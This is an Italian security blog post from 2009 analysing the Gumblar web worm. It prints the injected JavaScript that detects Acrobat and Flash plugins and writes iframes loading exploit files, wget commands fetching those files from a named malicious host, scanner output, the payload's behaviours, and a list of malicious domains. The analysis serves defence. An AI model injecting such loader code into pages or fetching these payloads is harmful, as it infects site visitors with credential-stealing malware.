Gumblar: la nuova minaccia
by admin on May.25, 2009, under Sicurezza
Un nuovo Worm, denominato Gumblar, costituisce l’ultima minaccia sul fronte del malware, ed è caratterizzato da un incredibile rapidità di diffusione, tanto da essere accreditato del 42% di tutte le infezioni a carico di websites registrate in una unica settimane (fonte: Sophos).
Conformemente ad uno schema comune al malware di più recente creazione, Gumblar sfrutta più vettori per la propagazione.
Il vettore principale è costituito dalla interazione client-server con siti precedentemente compromessi iniettando porzioni di codice Javascript all’interno di pagine assolutamente lecite, ovviamente all’insaputa degli ignari gestori. Tali script provocano il caricamento di elementi Flash e file PDF forgiati per sfruttare le vulnerabilità recentemente scoperte nei relativi ambienti di esecuzione (Flash Player e Acrobat Reader), e quindi poter installare ulteriori componenti malevoli sui computer degli ugualmente ignari visitatori.
Quella che segue è la porzione dello script che carica gli exploits. La funzione pdfswf() carica due iframes che referenziano gli exploits.
Si manifesta così se il browser è Internet Explorer:
function pdfswf()
{
PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
for(i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
document.write(”<iframe src=cache/readme.pdf></iframe>”);
}
}
catch(e){}
}
try
{
obj = new ActiveXObject(”ShockwaveFlash.ShockwaveFlash”);
if (obj)
{
document.write(”<iframe src=cache/flash.swf></iframe>”);
}
}
catch(e){}
}
pdfswf();
oppure così, se il browser individuato è di tipo diverso:
function pdfswf()
{
try
{
for(i = 0; i <= navigator.plugins.length; i++)
{
name = navigator.plugins[i].name;
if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
{
document.write("<iframe src=cache/readme.pdf></iframe>");
}
if(name.indexOf("Flash") != -1)
{
document.write("<iframe src=cache/flash.swf></iframe>");
}
}
}
catch(e){}
}
pdfswf();
Entrambi gli exploits sono facilmente ottenibili tramite wget, come di seguito:
# wget -d -v http://www.autobestwestern.cn:8080/cache/readme.pdf
[...]
# wget -d -v http://www.autobestwestern.cn:8080/cache/flash.swf
[...]
Il primo viene prontamente individuato da clamav:
# clamscan --verbose readme.pdf
Scanning readme.pdf
readme.pdf: Exploit.PDF-63 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 556474
Engine version: 0.95.1
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 1.00:1)
Time: 4.528 sec (0 m 4 s)
mentre il secondo passa indenne lo stesso esame.
Un esame successivo effettuato tramite il tool swfdump può tuttavia dare adito a qualche sospetto per la presenza del tag “DoABC” (tag:0×052), che serve ad incapsulare un file di tipo “ActionScript”, il quale si presenta come un ammasso di dati binari, evidenziabili ricorrendo al flag -d.
# swfdump -atp flash.swf
[HEADER] File version: 9
[HEADER] File is zlib compressed. Ratio: 60%
[HEADER] File size: 27673 (Depacked)
[HEADER] Frame rate: 24.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[041] 4 SCRIPTLIMITS
[009] 3 SETBACKGROUNDCOLOR (00/00/00)
[029] 26 SERIALNUMBER
[02b] 5 FRAMELABEL “Main”
==== Error: Unknown tag:0×052 ====
[052] 27584 (null)
==== Error: Unknown tag:0×04c ====
[04c] 9 (null)
[001] 0 SHOWFRAME 1 (00:00:00,000) (label “Main”)
[000] 0 END
I componenti scaricati in seguto a un exploit con esito positivo effettuano le seguenti operazioni:
Catturano eventuali credenziali per accounts FTP che circolano in chiaro nella rete locale di cui fa parte il computer infetto. Serve principalmente ad individuare nuovi server.
Inviano SPAM (viene installato uno spam bot)
Installano falsi antivirus
Modificano i risultati di interrogazioni effettuate attraverso Google, mediante installazione di un proxy sulla porta 7171, che redirige le ricerche verso pagine piene di risultati fasulli, da cui ricavare ulteriore malware o permettere ai cybercriminali di condurre attacchi di phishing per catturare credenziali di login.
Disabilitano i più comuni software di protezione e tools amministrativi, sul modello Conficker.
I domini finora individuati e che ospitano gli exploit descritti sono tutti cinesi. Molti fanno riferimento all’indirizzo IP 70.85.142.250, localizzabile però a Dallas, Texas, e sono in ascolto sulla porta 8080, in modo da sembrare innoqui se si tenta di connettersi ad essi direttamente:
*.autobestwestern.cn
*.bigbestfind.cn
*.casinoslotbet.cn
*.finditbig.cn
*.lotbetsite.cn
*.nanotopdiscover.cn
articlesworldonline.com
autobestwestern.cn
bestfindaloan.cn
bigbestfind.cn
bigtopcabaret.cn
carsdbs.com
casinoslotbet.cn
danitykanefan.com
evalongoriafan.com
fergiefan.com
findbigbrother.cn
finditbig.cn
gia-farrell.com
giantbeaversdiet.cn
giantnonfat.cn
greatbethere.cn
iratethis.com
lotbetsite.cn
lotwageronline.cn
mariasharapovaonline.com
markspitzusa.com
meganromano.com
mrphelps.com
mtb3fan.com
nanotopdiscover.cn
ns1.xenyo.com
suzdawg.com
swimstarsnews.com
tvnameshop.cn
www.autobestwestern.cn
www.casinoslotbet.cn
www.finditbig.cn
www.nanotopdiscover.cn
xenyo.com
Mentre sulla normale porta 80 è in ascolto un normale web server apache, sulla 8080 è attestato un proxy nginx ad alte prestazioni, il che fa pure sospettare che i payloads maligni siano ospitati in realtà in qualche altra parte del mondo.
L’infezione da Gumblar riguarda ugualmente, una volta tanto, sia piattaforme Windows che Unix-like, rispettando tuttavia una certa suddivisione di ruoli: server Linux nel ruolo di distributori inconsapevoli di collegamenti verso altri server distributori di malware, e clients Windows nel ruolo di zombies.
La circostanza implica pure una particolare responsabilità per i gestori di piattaforme tipicamente blog, ad esempio wordpress, che dovrebbero operare una certa vigilanza per evitare di assumere il ruolo da portatori sani dell’infezione.
May 25th, 2009 on 11:19 pm
Gumblar: la nuova minaccia…